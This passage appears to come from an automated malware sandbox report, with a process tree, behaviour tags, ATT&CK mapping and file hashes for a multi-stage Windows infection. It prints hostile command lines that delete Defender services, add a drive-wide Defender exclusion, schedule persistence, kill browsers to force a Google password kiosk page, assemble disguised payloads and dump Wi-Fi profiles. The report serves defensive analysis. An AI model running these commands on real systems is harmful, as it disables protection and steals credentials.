C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:5984
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:2704
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:1812
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:5748
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:4212
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:4152
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:2536
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:5448
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:5768
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:412
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:440
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:1708
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:4788
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:5780
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:3980
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:3592
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:5712
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:2756
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:428
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:4848
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:4836
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:4328
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:2000
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:1336
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:5956
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:1516
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:4540
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:2140
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:5904
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:5548
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:544
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:5788
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:748
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:1980
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:3992
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:3388
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:5532
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:3948
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:4416
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10444960101\bf6856f4dd.exe"C:\Users\Admin\AppData\Local\Temp\10444960101\bf6856f4dd.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:948 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10444960101\bf6856f4dd.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2572
-
-
-
C:\Users\Admin\AppData\Local\Temp\10444970101\ca1bffd716.exe"C:\Users\Admin\AppData\Local\Temp\10444970101\ca1bffd716.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10444970101\ca1bffd716.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2384
-
-
-
C:\Users\Admin\AppData\Local\Temp\10444980101\72551f9bea.exe"C:\Users\Admin\AppData\Local\Temp\10444980101\72551f9bea.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1896
-
-
C:\Users\Admin\AppData\Local\Temp\10444990101\a594ddf458.exe"C:\Users\Admin\AppData\Local\Temp\10444990101\a594ddf458.exe"6⤵
- Checks BIOS information in registry
- Executes dropped EXE
PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\10445000101\43f9a4e9b0.exe"C:\Users\Admin\AppData\Local\Temp\10445000101\43f9a4e9b0.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5340 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:4308
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5916 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {4b67514f-f5b7-41dc-bbab-f25d9f0abfee} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:4628
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {29ffa76f-610c-45f1-b008-76540756ed5e} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:5952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3816 -prefsLen 25164 -prefMapHandle 3820 -prefMapSize 270279 -jsInitHandle 3824 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3832 -initialChannelId {44981415-6b03-47a2-ac75-e63f62346319} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:5044
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3984 -prefsLen 27276 -prefMapHandle 3988 -prefMapSize 270279 -ipcHandle 4080 -initialChannelId {37c88acf-557d-484d-8c6b-eb4a9f9fdd96} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:5040
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4412 -prefsLen 34775 -prefMapHandle 4416 -prefMapSize 270279 -jsInitHandle 4420 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3108 -initialChannelId {f72fc136-a40f-42d2-8a30-eac9f7e17185} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:3568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5028 -prefsLen 35012 -prefMapHandle 5032 -prefMapSize 270279 -ipcHandle 5040 -initialChannelId {682d8e92-2999-4569-ae73-468248d2d4ff} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:4764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5252 -prefsLen 32952 -prefMapHandle 5248 -prefMapSize 270279 -jsInitHandle 5244 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5316 -initialChannelId {a654aca5-664a-49b9-986d-bbcc867d3009} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:3292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3412 -prefsLen 32952 -prefMapHandle 5244 -prefMapSize 270279 -jsInitHandle 5248 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3420 -initialChannelId {6775e821-50a9-4b14-85c9-f60fce5abf78} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:956
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5720 -prefsLen 32952 -prefMapHandle 5724 -prefMapSize 270279 -jsInitHandle 5728 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5736 -initialChannelId {b9e0bc98-6f98-458e-924a-349738c71c91} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:1812
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10445010101\c390a85ab1.exe"C:\Users\Admin\AppData\Local\Temp\10445010101\c390a85ab1.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:404
-
-
C:\Users\Admin\AppData\Local\Temp\10445020101\qhjMWht.exe"C:\Users\Admin\AppData\Local\Temp\10445020101\qhjMWht.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2800
-
-
C:\Users\Admin\AppData\Local\Temp\10445030101\ICQ0sog.exe"C:\Users\Admin\AppData\Local\Temp\10445030101\ICQ0sog.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3216 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3784
-
-
-
C:\Users\Admin\AppData\Local\Temp\10445040101\larBxd7.exe"C:\Users\Admin\AppData\Local\Temp\10445040101\larBxd7.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3252 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat7⤵
- System Location Discovery: System Language Discovery
PID:3008 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4536
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:5304
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵PID:1596
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6899128⤵
- System Location Discovery: System Language Discovery
PID:5108
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Exclusion.psd8⤵PID:4348
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "users" Findarticles8⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com8⤵
- System Location Discovery: System Language Discovery
PID:5528
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b8⤵
- System Location Discovery: System Language Discovery
PID:6032
-
-
C:\Users\Admin\AppData\Local\Temp\689912\Jordan.comJordan.com b8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5456
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
PID:4688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10445050101\Yhihb8G.exe"C:\Users\Admin\AppData\Local\Temp\10445050101\Yhihb8G.exe"6⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5748 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All7⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1980 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:1620
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1472
-
-
C:\Windows\SysWOW64\findstr.exefindstr All8⤵
- System Location Discovery: System Language Discovery
PID:5644
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 25287⤵
- Program crash
PID:4100
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid7⤵
- System Location Discovery: System Language Discovery
PID:6108 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:1344
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10445060101\9sWdA2p.exe"C:\Users\Admin\AppData\Local\Temp\10445060101\9sWdA2p.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2492
-
-
C:\Users\Admin\AppData\Local\Temp\10445070101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10445070101\TbV75ZR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4784 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4448
-
-
-
C:\Users\Admin\AppData\Local\Temp\10445080101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10445080101\7IIl2eE.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5836 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵
- System Location Discovery: System Language Discovery
PID:1784 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5516
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵PID:2112
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:5524
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183778⤵
- System Location Discovery: System Language Discovery
PID:440
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab8⤵
- System Location Discovery: System Language Discovery
PID:2800
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation8⤵
- System Location Discovery: System Language Discovery
PID:4308
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com8⤵
- System Location Discovery: System Language Discovery
PID:5496
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N8⤵
- System Location Discovery: System Language Discovery
PID:4656
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4788
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
PID:4492
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10445090101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10445090101\UZPt0hR.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4624 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:4252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3768
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4900 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
PID:5768
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:3256
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10445100101\ee9ac1adbe.exe"C:\Users\Admin\AppData\Local\Temp\10445100101\ee9ac1adbe.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5744
-
-
C:\Users\Admin\AppData\Local\Temp\10445110101\1e9b491d42.exe"C:\Users\Admin\AppData\Local\Temp\10445110101\1e9b491d42.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:13216
-
-
C:\Users\Admin\AppData\Local\Temp\10445120101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10445120101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4180
-
-
C:\Users\Admin\AppData\Local\Temp\10445130101\i4cwegu.exe"C:\Users\Admin\AppData\Local\Temp\10445130101\i4cwegu.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:740
-
-
C:\Users\Admin\AppData\Local\Temp\10445140101\but2.exe"C:\Users\Admin\AppData\Local\Temp\10445140101\but2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5648 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:3284
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5716
-
-
C:\Drivers\pcidrv.exeC:\Drivers\pcidrv.exe7⤵
- Executes dropped EXE
PID:3736
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10445140101\but2.exe7⤵PID:5156
-
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6184
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4704
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5748 -ip 57481⤵PID:3488
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:1012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:1444
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1720
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
7Windows Service
7Event Triggered Execution
1Netsh Helper DLL
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
7Windows Service
7Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
6Disable or Modify Tools
5Modify Registry
7Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Discovery
Network Service Discovery
2Process Discovery
1Query Registry
7System Information Discovery
4System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Wi-Fi Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
3.0MB
MD591f372706c6f741476ee0dac49693596
SHA18e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d
SHA2569a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781
SHA51288b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed
-
Filesize
16KB
MD5e085965af7b7369150d0b72a8f7c0042
SHA1b6e7537fc54dfbc1c5f5dc77f06019e4b65f4a72
